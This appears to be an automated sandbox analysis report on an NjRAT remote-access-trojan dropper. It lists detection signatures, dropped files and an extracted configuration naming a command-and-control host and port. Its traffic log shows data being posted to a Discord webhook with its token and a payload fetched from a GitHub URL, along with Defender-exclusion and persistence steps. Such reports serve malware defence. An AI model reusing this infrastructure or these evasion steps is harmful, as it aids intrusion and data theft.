Windows Analysis Report
virus.exe.bin.exe

Overview

General Information

Sample name: virus.exe.bin.exe
Analysis ID: 1645584
MD5: b7ba3e0d0b59d704526b7ba31af583dc
SHA1: 9b69ae0cd6c19534e468f0c3616af680dd887445
SHA256: 69398832076d266d4a8fc08d36e150d39d976ea93e3bc03af2e1584107d8f815
Tags: exe, user-TornadoAV_dev
Infos:

Detection

Njrat
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Njrat
.NET source code contains a sample name check
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Adds extensions / path to Windows Defender exclusion list (Registry)
Contains functionality to log keystrokes (.Net Source)
Creates autostart registry keys with suspicious names
Disables zone checking for all users
Drops PE files to the startup folder
Encrypted powershell cmdline option found
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Potential dropper URLs found in powershell memory
Protects its processes via BreakOnTermination flag
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: System File Execution Location Anomaly
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dllhost Internet Connection
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Windows Defender Exclusions Added - Registry
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Stores files to the Windows start menu directory
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Classification chart categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner (scale: clean, suspicious, malicious)
Name: NjRAT
Description: RedPacket Security describes NJRat as "a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives." It is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.
Attribution:
  • AQUATIC PANDA
  • Earth Lusca
  • Operation C-Major
  • The Gorgon Group
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat

AV Detection

Source: virus.exe.bin.exe Avira: detected
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Roaming\dllhost.exe Avira: detection malicious, Label: TR/Dropper.Gen7
Source: C:\ClickMe.exe Avira: detection malicious, Label: TR/Dropper.Gen7
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Avira: detection malicious, Label: TR/Dropper.Gen7
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe Avira: detection malicious, Label: TR/Dropper.Gen7
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Avira: detection malicious, Label: TR/Dropper.Gen
Source: 11.2.final.exe.3758448.0.raw.unpack Malware Configuration Extractor: Njrat {"Host": "gabh.gotdns.ch", "Port": "7777", "Version": "<- NjRAT 0.7d Horror Edition ->", "Registry Name": "c382eb151c59bd833b24120723eac541", "Campaign ID": "User", "Network Seprator": "Y262SUCZ4UJJ"}
Source: C:\ClickMe.exe ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe ReversingLabs: Detection: 21%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\dllhost.exe ReversingLabs: Detection: 91%
Source: virus.exe.bin.exe ReversingLabs: Detection: 66%
Source: virus.exe.bin.exe Virustotal: Detection: 65%
Source: Yara match File source: virus.exe.bin.exe, type: SAMPLE
Source: Yara match File source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.final.exe.133459a2.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.Payload.exe.2a6fef8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.virus.exe.bin.exe.1356599f.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Hyra.exe.12ababba.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.virus.exe.bin.exe.1356abb7.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Hyra.exe.12ab59a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Hyra.exe.12ac83ca.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.virus.exe.bin.exe.13560788.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000000.1505405429.0000000000472000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.3915823242.0000000002681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1598765313.000000000337B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.1646811109.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: virus.exe.bin.exe PID: 752, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Hyra.exe PID: 1952, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: final.exe PID: 3320, type: MEMORYSTR
Source: Yara match File source: C:\ClickMe.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe, type: DROPPED
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.6% probability
Source: C:\Users\user\Desktop\virus.exe.bin.exe File opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_88e266cb2fac7c0d\MSVCR80.dll
Source: unknown HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.6:49682 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.6:49684 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.113.3:443 -> 192.168.2.6:49685 version: TLS 1.2
Source: virus.exe.bin.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000009.00000002.2354465263.000002542A367000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000009.00000002.2354465263.000002542A367000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 Corporation1)0' source: powershell.exe, 00000009.00000002.2354465263.000002542A367000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Daniel\source\repos\joinerStub\obj\Release\joinerStub.pdb source: virus.exe.bin.exe, 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, virus.exe.bin.exe, 00000000.00000000.1431169171.0000000000E32000.00000002.00000001.01000000.00000003.sdmp, Hyra.exe, 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\Daniel\program.pdb source: virus.exe.bin.exe, 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, Hyra.exe, 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, final.exe, 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp

Change of critical system settings

Source: C:\Windows\System32\reg.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths C:\

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 16_2_079BB248
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 16_2_079BB238

Networking

Source: Network traffic Suricata IDS: 2033132 - Severity 1 - ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll) : 192.168.2.6:49691 -> 46.121.250.34:7777
Source: Network traffic Suricata IDS: 2021176 - Severity 1 - ET MALWARE Bladabindi/njRAT CnC Command (ll) : 192.168.2.6:49691 -> 46.121.250.34:7777
Source: Network traffic Suricata IDS: 2838486 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi Variant CnC Activity (inf) : 192.168.2.6:49691 -> 46.121.250.34:7777
Source: C:\Users\user\AppData\Roaming\dllhost.exe Network Connect: 46.121.250.34 7777
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp String found in memory: <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-74231a1f3bbb.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-8a995f0bacd4.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-f37fb7684b1f.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-9ac301c3ebe5.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-cd826e8636dc.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-f91b0f603451.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-83beb16e0ecf.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-6e122dab64fc.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-18119e682df0.css" />
Source: global traffic TCP traffic: 192.168.2.6:49691 -> 46.121.250.34:7777
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic HTTP traffic detected: POST /api/webhooks/1352684770521387070/EnDdIPnq1Toz0toXGIhTo1T09Jq8MMJhXvjTWp5MjXqBLpdpS9QoPUThjc3XSnogFIz9 HTTP/1.1Content-Type: application/jsonHost: discordapp.comContent-Length: 80Expect: 100-continueConnection: Keep-Alive
Source: Joe Sandbox View IP Address: 140.82.113.3 140.82.113.3
Source: Joe Sandbox View IP Address: 162.159.129.233 162.159.129.233
Source: Joe Sandbox View IP Address: 162.159.129.233 162.159.129.233
Source: Joe Sandbox View IP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox View IP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox View ASN Name: GOLDENLINES-ASNPartnerCommunicationsMainAutonomousSyste GOLDENLINES-ASNPartnerCommunicationsMainAutonomousSyste
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49683 -> 172.67.74.152:443
Source: Network traffic Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.6:49685 -> 140.82.113.3:443
Source: global traffic HTTP traffic detected: GET /AnonAm0369/am/raw/refs/heads/main/RuntimeBroker.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic HTTP traffic detected: GET /AnonAm0369/am/raw/refs/heads/main/RuntimeBroker.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: api.ipify.org
Source: global traffic DNS traffic detected: DNS query: discordapp.com
Source: global traffic DNS traffic detected: DNS query: github.com
Source: global traffic DNS traffic detected: DNS query: gabh.gotdns.ch
Source: unknown HTTP traffic detected: POST /api/webhooks/1352684770521387070/EnDdIPnq1Toz0toXGIhTo1T09Jq8MMJhXvjTWp5MjXqBLpdpS9QoPUThjc3XSnogFIz9 HTTP/1.1Content-Type: application/jsonHost: discordapp.comContent-Length: 80Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Fri, 21 Mar 2025 22:09:50 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-WithCache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/U3
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/allow-java-encodingsler
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/continue-after-fatal-errorLastChi=
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/create-cdata-nodes
Source: javaw.exe, 0000000C.00000002.3917502159.0000000014B2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/disallow-doctype-decln
Source: javaw.exe, 0000000C.00000002.3917502159.0000000014B2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/disallow-doctype-declna
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/dom/create-entity-ref-nodes
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansion
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansion9
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/dom/include-ignorable-whitespace
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotationsme
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/honour-all-schemaLocationsNodeVal;
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/include-comments
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/internal/parser-settings
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/internal/parser-settings7
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicatesling
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-onlyy/
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/namespace-growthh
Source: javaw.exe, 0000000C.00000002.3917502159.0000000014B06000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/namespaces
Source: javaw.exe, 0000000C.00000002.3917502159.0000000014B06000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/namespacesA
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtdte:
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/scanner/notify-builtin-refsf-node7
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/scanner/notify-char-refst3
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/standard-uri-conformant
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validate-annotationsce
Source: javaw.exe, 0000000C.00000002.3918752239.0000000014F9C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.2692372832.0000000014F95000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-treeskN1
Source: javaw.exe, 0000000C.00000002.3918752239.0000000014F9C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.2692372832.0000000014F95000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/dynamicrnal/im
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/id-idref-checking/xml/F
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/identity-constraint-checkingum
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema-full-checkingor=
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/augment-psvispa
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/element-defaultO
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/ignore-xsi-type-until-elemdeclnA
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-valueang/IllB
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/unparsed-entity-checkingva/lanB
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdefutil/SD
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdefniti:
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/warn-on-duplicate-entitydef/w3c/d
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/xinclude
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-uris
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language;
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/xinclude;
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/dom/current-element-node
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/dom/document-class-name$
